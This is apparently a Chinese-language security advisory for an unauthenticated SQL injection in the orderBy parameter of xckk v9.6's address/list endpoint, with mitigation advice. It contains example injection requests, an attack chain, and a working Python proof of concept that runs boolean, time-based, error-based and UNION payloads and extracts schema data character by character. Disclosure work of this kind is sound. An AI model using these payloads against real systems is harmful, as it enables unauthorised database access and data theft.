CVE-2025-60266：xckk v9.6 address/list接口SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-60266

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

xckk

漏洞概述

CVE-2025-60266是xckk系统v9.6版本中存在的一个SQL注入漏洞。该漏洞位于address/list接口的orderBy参数处，由于该参数未经过充分的安全过滤和参数化处理，攻击者可以通过构造恶意的SQL语句作为orderBy参数的值，注入到后端数据库查询中，从而实现未授权的数据库操作。

xckk是一款信息管理系统，其address/list接口用于查询和展示地址列表数据，通常会接收用户传入的排序字段（orderBy参数）来确定查询结果的排序方式。然而，在v9.6版本中，该参数直接被拼接到SQL查询语句中，未进行任何转义或参数化处理，导致攻击者可以通过注入额外的SQL语句片段来操控数据库查询逻辑。

该漏洞的CVSS 3.1评分为6.5，属于中等严重等级。攻击者无需认证即可通过网络远程利用，且不需要用户交互。漏洞的成功利用可能造成数据库信息的未授权读取或篡改，对系统的机密性和完整性造成低级别的影响。虽然该漏洞不会直接导致系统不可用，但攻击者可以利用SQL注入进一步探测数据库结构、提取敏感数据，甚至在某些数据库配置下执行系统命令，从而扩大攻击影响。

该漏洞由安全研究员int-ux发现并报告，漏洞详细信息已在Gitee和GitHub上公开披露。建议使用xckk v9.6及以下版本的用户及时关注官方补丁发布情况，并采取相应的防护措施。

技术细节

该SQL注入漏洞的技术原理在于address/list接口对orderBy参数的处理不当。在标准的SQL查询中，ORDER BY子句用于对查询结果进行排序，通常形式为：SELECT * FROM addresses ORDER BY <column_name> [ASC|DESC]。

在xckk v9.6版本的实现中，后端代码直接将用户传入的orderBy参数拼接到SQL语句中，而未使用预编译参数化查询或对参数进行严格的合法性校验。攻击者可以通过在orderBy参数中注入SQL语句片段来改变原始查询的语义。

典型的利用方式包括：
1. 注入UNION SELECT语句来读取其他数据库表中的数据；
2. 利用ORDER BY后的子查询进行盲注，通过布尔或时间差异提取数据；
3. 利用IF/CASE语句进行基于条件的注入。

例如，攻击者可以发送如下请求：
GET /address/list?orderBy=id;SELECT+1--

或者利用基于布尔的盲注：
GET /address/list?orderBy=IF(1=1,id,(SELECT+1+FROM+information_schema.tables))--

由于漏洞无需认证即可利用，攻击者只需通过网络直接向目标系统的address/list接口发送精心构造的HTTP请求即可触发。漏洞的影响范围包括数据库敏感信息的泄露（如用户凭证、个人信息等）以及数据篡改风险。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络侦察发现目标系统运行xckk v9.6版本，通过分析系统接口识别出address/list端点接收orderBy参数。

STEP 2

步骤2：漏洞探测

攻击者向address/list接口发送带有特殊SQL字符的orderBy参数（如单引号、分号、UNION SELECT等），观察响应差异以确认SQL注入漏洞的存在。

STEP 3

步骤3：注入利用

攻击者根据数据库类型（推测为MySQL）构造相应的注入payload，利用布尔盲注、时间盲注或UNION注入等技术提取数据库信息。

STEP 4

步骤4：数据提取

通过注入语句查询information_schema获取数据库结构，进一步提取用户表、密码哈希等敏感数据。

STEP 5

步骤5：权限提升或数据破坏

利用获取的数据尝试登录系统，或通过注入进一步执行数据库操作如INSERT/UPDATE/DELETE来篡改或破坏数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60266 - xckk v9.6 SQL Injection PoC
# Vulnerability: SQL injection via orderBy parameter in address/list endpoint
# Author: Security Research (int-ux)

import requests
import sys

TARGET_URL = "http://target-host"
ENDPOINT = "/address/list"

def test_sql_injection(target_url):
    """Test SQL injection vulnerability in orderBy parameter"""
    url = target_url + ENDPOINT

    # Normal request baseline
    normal_payload = {"orderBy": "id"}
    try:
        normal_resp = requests.get(url, params=normal_payload, timeout=10)
        normal_length = len(normal_resp.text)
        print(f"[+] Normal response length: {normal_length}")
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return

    # Boolean-based blind injection test
    # If condition is true, order by id; if false, cause error or different result
    payloads = [
        # Test 1: Basic injection check
        ("id", "Normal"),
        ("id,(SELECT 1)", "Union/Subquery"),
        # Test 2: Boolean-based blind
        ("IF(1=1,id,username)", "Boolean true"),
        ("IF(1=2,id,username)", "Boolean false"),
        # Test 3: Error-based
        ("id AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)", "Error-based"),
        # Test 4: Time-based blind
        ("id AND SLEEP(3)", "Time-based"),
        # Test 5: UNION-based
        ("1 UNION SELECT 1,2,3,4,5-- -", "UNION injection"),
    ]

    for payload, desc in payloads:
        try:
            resp = requests.get(url, params={"orderBy": payload}, timeout=15)
            print(f"[+] Payload: {desc} | Status: {resp.status_code} | Length: {len(resp.text)}")

            # Check for time-based injection
            if "SLEEP" in payload:
                import time
                start = time.time()
                requests.get(url, params={"orderBy": payload}, timeout=15)
                elapsed = time.time() - start
                if elapsed > 2:
                    print(f"[!] TIME-BASED INJECTION CONFIRMED! Elapsed: {elapsed:.2f}s")
        except requests.exceptions.Timeout:
            print(f"[!] TIMEOUT - Possible time-based injection: {desc}")
        except Exception as e:
            print(f"[-] Error with payload '{desc}': {e}")

def extract_data_blind(target_url, table_name):
    """Extract data using boolean-based blind SQL injection"""
    url = target_url + ENDPOINT
    extracted = ""

    for i in range(1, 50):
        # Extract character by character using ASCII comparison
        low, high = 32, 126
        while low <= high:
            mid = (low + high) // 2
            # MySQL boolean blind injection payload
            payload = f"IF(ASCII(SUBSTRING((SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}'),{i},1))>{mid},id,username)"
            try:
                resp = requests.get(url, params={"orderBy": payload}, timeout=10)
                # Compare response to determine boolean result
                if len(resp.text) == len(requests.get(url, params={"orderBy": "id"}, timeout=10).text):
                    low = mid + 1
                else:
                    high = mid - 1
            except:
                break

        if low > 126:
            break
        extracted += chr(low)
        print(f"[+] Extracted so far: {extracted}")

    return extracted

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    print(f"[*] Testing SQL injection on: {target}")
    test_sql_injection(target)

影响范围

xckk v9.6

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在Web应用防火墙（WAF）中添加针对address/list接口orderBy参数的SQL注入防护规则；2）在反向代理层面对orderBy参数进行正则过滤，仅允许字母、数字和下划线等安全字符；3）限制address/list接口的访问频率和来源IP，防止自动化注入攻击；4）监控数据库日志，排查是否存在异常的SQL查询记录；5）临时关闭或限制address/list接口的对外访问，仅对可信内网开放。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60266
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60266
3 Details https://www.cvedetails.com/cve/CVE-2025-60266/
4 VulDB https://vuldb.com/cve/CVE-2025-60266
5 Link https://gitee.com/bestfeng/xckk
6 Link https://github.com/int-ux/report/issues/2